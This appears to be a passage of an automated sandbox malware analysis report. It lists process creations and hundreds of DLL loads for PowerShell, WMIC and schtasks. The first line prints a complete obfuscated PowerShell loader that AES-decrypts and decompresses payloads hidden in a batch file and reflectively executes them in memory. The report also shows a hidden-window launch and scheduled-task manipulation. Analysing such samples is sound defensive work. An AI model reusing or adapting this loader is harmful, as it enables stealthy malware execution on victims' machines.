Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
